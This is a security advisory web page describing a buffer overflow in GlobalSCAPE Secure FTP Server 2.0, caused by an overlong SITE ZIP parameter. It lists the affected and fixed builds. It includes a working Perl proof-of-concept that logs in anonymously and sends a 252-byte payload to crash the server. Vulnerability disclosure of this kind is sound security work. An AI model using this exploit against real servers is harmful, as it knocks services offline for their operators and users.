GlobalSCAPE Secure FTP Server Buffer Overflow (Parameter Handling)

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

Home
Ask the Team
Mailing Lists
Advertising Info
Advisories
About SecuriTeam
Blogs

Brought to you by:

Suppliers of:

SecuriTeam in Your Inbox

New vulnerability?
New tool?
Tell us
(Our PGP key).

Confidence 2013

5% Off any SANS course
Use Code: SecuriTeam_5

Hack In Paris

La Nuit du Hack

Subjects of Interest:
Vulnerability Management
SQL Injection
Buffer Overflows
Active Network Scanning
Fuzzing
Fuzzer Report
Network Security
Network Scanner
Pen Testing
Security Scanner

A vulnerability in GlobalSCAPE Secure FTP Server allows a user issuing a long parameter (around 252 bytes) as a value for a SITE command, to cause the server to try and write to a value that is outside the memory location of the Secure FTP Server's memory. This in will cause an exception to be triggered (an un-handled exception), which causes the program to crash.

Credit:
SecurITeam would like to thank STORM for finding this vulnerability.

Free Website Security Scan	Free Fuzzer Report	Vulnerability Assessment
Detect web app vulnerabilities	University study comparing the top	Accurate and automated scanning
Get guidance from professionals.	6 commercially availble fuzzers.	for networks of any size.

Protect your website!
Free Trial, Nothing to install.
No interruption of visitors.
www.beyondsecurity.com/vulnerability-scanner

Vulnerable Systems:
* GlobalSCAPE Secure FTP Server version 2.0 Build 03.11.2004.2

Immune Systems:
* GlobalSCAPE Secure FTP Server version 2.0 Build 03.16.2004.1

Exploit:
To demonstrate this issue we will use the SITE ZIP command, even though SITE ZIP isn't a supported command, and will use SITE ZIP's parameter "/d:" provided after that command gets parsed, which causes the vulnerability.

#!/usr/bin/perl

use IO::Socket;

$host = "192.168.1.243";

$remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "2117");

unless ($remote) { die "cannot connect to ftp daemon on $host" }

print "connected\n";
while (<$remote>)
{
print $_;
if (/220 /)
{
  last;
}
}

$remote->autoflush(1);

my $ftp = "USER anonymous\r\n";

print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
print $_;
if (/331 /)
{
  last;
}
}

$ftp = join("", "PASS ", "a\@b.com", "\r\n");
print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
print $_;
if (/230 /)
{
  last;
}
}

$ftp = join ("", "SITE ZIP /d:", "A"x(252), "\r\n");

print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
print $_;
if (/250 Done/)
{
  last;
}
}

close $remote;

blog comments powered by Disqus

	Microsoft Windows USB Driver Memory Object Handling Local Privilege (2013-1287) Vulnerability
	Microsoft IE SaveHistory Onload Event Handling Use-After-Free Arbitrary Code Execution Vulnerability
	Microsoft IE CMarkupBehaviorContext Use-After-Free Arbitrary Code Execution Vulnerability
	Microsoft SharePoint XSS Vulnerability
	Microsoft IE OnBeforeCopy Use-After-Free Arbitrary Code Execution Vulnerability
	Microsoft Windows USB Driver Memory Object Handling Local Privilege Escalation Vulnerability
	Microsoft OneNote Buffer Size Validation ONE File Handling Information Disclosure Vulnerability
	Microsoft IE GetMarkupPtr execCommand Print Event Handling Use-after-free Execution Vulnerability
	Microsoft SharePoint Remote Overflow DoS Vulnerability
	Microsoft IE CTreeNode Use-After-Free Arbitrary Code Execution Vulnerability
	Microsoft Windows USB Driver Memory Object Handling Local Privilege (2013-1286) Vulnerability
	Microsoft IE CTreeNode Use-After-Free Use-After-Free Arbitrary Execution Vulnerability
	Microsoft IE Proxy Server TCP Session Re-Use Cross-User Information Disclosure Weakness Vulnerability
	Microsoft IE Shift JIS Character Encoding Information Disclosure Vulnerability
	Microsoft IE SetCapture Use-after-free Arbitrary Code Execution Vulnerability
	Microsoft IE Vector Markup Language (VML) Buffer Allocation Memory Corruption Vulnerability
	Microsoft Windows Kernel Memory Object Handling Local Privilege Escalation Vulnerability
	Microsoft System Center Operations Web Console XSS Vulnerability
	Microsoft Lync User-Agent Header Handling Remote Arbitrary Command Execution Vulnerability
	Microsoft System Center Operations Manager Web Console XSS Vulnerability

Featured Articles

	Microsoft Windows USB Driver Memory Object Handling Local Privilege (2013-1287) Vulnerability
	Microsoft Windows USB Driver Memory Object Handling Local Privilege Escalation Vulnerability
	Microsoft Windows Kernel Memory Object Handling Local Privilege Escalation Vulnerability
	Microsoft Windows SSL/TSL Forced Downgrade MitM Weakness
	Microsoft Windows Memory Object Handling Local Memory Privilege Escalation Vulnerability
	Microsoft Windows Privilege Escalation Vulnerability
	Microsoft .NET Framework Serialization Remote Code Execution Vulnerability
	Microsoft Visio Viewer VSD File Format Remote Code Execution Vulnerability
	Microsoft .NET Framework Input Serialization CVE-2012-0160 Remote Code Execution Vulnerability
	Microsoft .NET Framework ASP.NET Forms Authentication Bypass Vulnerability
	'TrendMicro Control Manager CASProcessor.exe BLOB Code Execution Vulnerability'
	'HP iNode Management Center iNodeMngChecker.exe Code Execution Vulnerability'
	'HP Data Protector Backup Client Service EXEC_SCRIPT Code Execution Vulnerability'
	'Microsoft Internet Explorer Property Change Memory Corruption Vulnerability'
	'Microsoft Office PowerPoint PersistDirectoryEntry Code Execution Vulnerability'
	'CA Total Defense Suite Heartbeat Web Service Code Execution Vulnerability'
	'HP Web Jetadmin Unauthorized Access to Managed Resources Vulnerability'
	'Novell Zenworks Handheld Management ZfHIPCnd.exe Opcode 2 Code Execution Vulnerability'
	'Microsoft Windows Shell Graphics biCompression Buffer Overflow Vulnerability'
	'Microsoft Office PICT Filter Integer Truncation Vulnerability'

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus - Blogs - CVEs